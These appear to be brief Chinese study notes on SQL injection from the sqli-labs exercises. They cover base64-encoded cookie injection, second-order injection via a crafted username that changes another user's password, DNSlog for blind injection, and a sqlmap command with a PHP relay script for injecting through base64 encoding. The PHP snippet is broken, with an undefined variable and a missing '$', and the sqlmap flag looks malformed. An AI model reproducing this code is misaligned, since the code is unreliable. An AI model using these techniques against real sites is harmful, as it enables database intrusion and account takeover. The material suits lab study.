加解密,二次,DNSlog注入
注入原理,演示案例,实际应用。
less-21关,base64进行解密 encode加密decode解密 cookie处注入
判断加密算法,然后进行注入
less-24关,先注册一个账户dudu'#,假设存在dudu,而后修改密码dudu'# 已经闭合,错误的执行了,注入语句,将dudu的密码成功修改
DNSlog:解决了盲注不能回显数据,效率低等问题,盲注解决了没有回显的问题
中转注入:
python sqlmap.py -u "http://127.0.0.1/test.php?x=" -v -3
<?php
$url = 'http://dudu.com?id=';
$urls = base64_encode($_GET['x']);
$urls = $url . $payload;
file_get_contents(urls);
#echo $urls;
?>
php中.号表示拼接